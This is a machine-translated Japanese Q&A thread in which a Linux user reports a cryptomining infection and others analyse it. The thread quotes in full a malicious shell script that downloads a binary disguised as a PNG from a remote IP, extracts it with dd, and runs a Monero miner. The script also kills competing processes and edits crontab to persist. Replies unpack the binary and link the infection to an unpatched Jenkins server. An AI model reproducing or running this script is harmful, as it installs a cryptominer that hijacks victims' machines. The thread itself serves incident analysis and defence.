Clamは、Ubuntu Linuxマシンの/ tmpディレクトリで「kworker34」という名前のこのファイルを見つけました。早速このファイルを削除しました。また、シェルファイルkws.shも見つかりました。ロシアとウクライナの2つのIPアドレスに接続しているようです。
誰かこれを見た?
これはkwa.shの内容です-
#!/bin/sh
ps -fe|grep kworker34 |grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
wget 91.235.143.237/miu.png -O /tmp/conn
dd if=/tmp/conn skip=7664 bs=1 of=/tmp/kworker34
else
wget -O /tmp/kworker34 http://91.235.143.237/kworker_na
fi
chmod +x /tmp/kworker34
Nohup /tmp/kworker34 -B -a cryptonight -o stratum+tcp://185.154.52.74:80 -u 13 -p x >/dev/null 2>&1 &
else
echo "runing....."
fi
pkill -f conns
pkill -f irqbalance
crontab -l | sed '/91.230.47.40/d' | crontab -
sleepTime=20
while [ 0 -lt 1 ]
do
ps -fe| grep kworker34 | grep -v grep
if [ $? -ne 0 ]
then
echo "process not exists ,restart process now... "
wget 91.235.143.237/miu.png -O /tmp/conn
dd if=/tmp/conn skip=7664 bs=1 of=/tmp/kworker34
chmod +x /tmp/kworker34
Nohup /tmp/kworker34 -a cryptonight -o stratum+tcp://185.154.52.74:80 -u 13 -p x >/dev/null 2>&1 &
echo "restart done ..... "
else
echo "process exists , sleep $sleepTime seconds "
pkill -f conns
pkill -f irqbalance
crontab -l | sed '/91.230.47.40/d' | crontab -
fi
sleep $sleepTime
done
_... /tmp/kworker34 ... -o stratum+tcp://185.154.52.74:80 ...
_
stratum + tcp のグーグルは、暗号通貨マイニングが進行中であることを示します。
_wget 91.235.143.237/miu.png -O /tmp/conn dd if=/tmp/conn skip=7664 bs=1 of=/tmp/kworker34
_
_file /tmp/kworker34
_でよく見ると、/tmp/kworker34: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
になります。つまり、PNGファイルはLinuxバイナリの転送に使用されます。
_strings /tmp/kworker34
_は多くの迷惑メールに分類されます:
_$Info: This file is packed with the UPX executable packer http://upx.sf.net $
$Id: UPX 3.91 Copyright (C) 1996-2013 the UPX Team. All Rights Reserved. $
_
UPXパッカー自体は悪くありませんが、マルウェアのコンテキストでよく使用されます。 _upx -d
_を使用してファイルを解凍し、再度strings
を実行すると、興味深い文字列が表示されます。
_User-Agent: cpuminer/2.3.3
...
Try `minerd --help' for more information.
Usage: minerd [OPTIONS]
-o, --url=URL URL of mining server
-O, --userpass=U:P username:password pair for mining server
...
_
したがって、これはおそらくcpuminerバージョン2.3.3であり、次のように記述されています on github 。
これは、Jeff GarzikのリファレンスcpuminerのフォークであるLitecoinとBitcoinのマルチスレッドCPUマイナーです。
不要なマイナーのトピックの詳細については、 [感染したデバイスにビットコインマイニングソフトウェアをインストールする新しいLinuxマルウェア および その他のリンク を参照してください。
はい、最近、古いJenkinsインスタンスでコードを実行できるJenkinsの脆弱性が発見されました。通常、Monero暗号通貨プログラムをマイニングします。詳細については、次のリンクを確認してください。
http://jenkins-ci.361315.n4.nabble.com/cryptonight-exploit-td4898258.htmlhttps://Twitter.com/jenkinsci/status/864178120827428864
感染を防ぐには、2.46.2/2.57以降のバージョンのJenkinsをインストールしてください。
ところでWannaCryが登場する1週間前に、Moneroマルウェアマイナーの大きな広がりがありました。
プロセスが私のjenkinsビルドサーバーのユーザー認証情報で実行されていることがわかりました。これは感染の1つの方法である可能性があります。
[私はこれを回答として投稿するので、この問題が発生している可能性があるすべての人に役立ちます]
この問題を掘り下げて、これが起こっていたと思います。侵入者は私のアプリケーションのホールを使用して、tarファイルを/ tmpディレクトリにダウンロードするコマンドを実行していました。次に、コマンドを実行してtarファイルの内容を抽出します。 tarにはShellファイルが含まれています。次に、シェルファイル自体を実行します。
システムのスクリプトに侵入者がこっそり侵入できるようにするアプリケーションの穴を見つけることができませんでした。どうやって彼が入ったのかを見つけるのはそれほど難しくないと思います。私がその後に行く時間があまりなかったというだけです。私はすぐにそれに到達し、確かに彼を締め出すでしょう。
その間、ファイルシステムでスクリプトがダウンロードされて実行されるのを防ぐために、システムにいくつかの変更を加えました。
これらのステップは、今のところ侵入者を締め出すのに役立っているようです。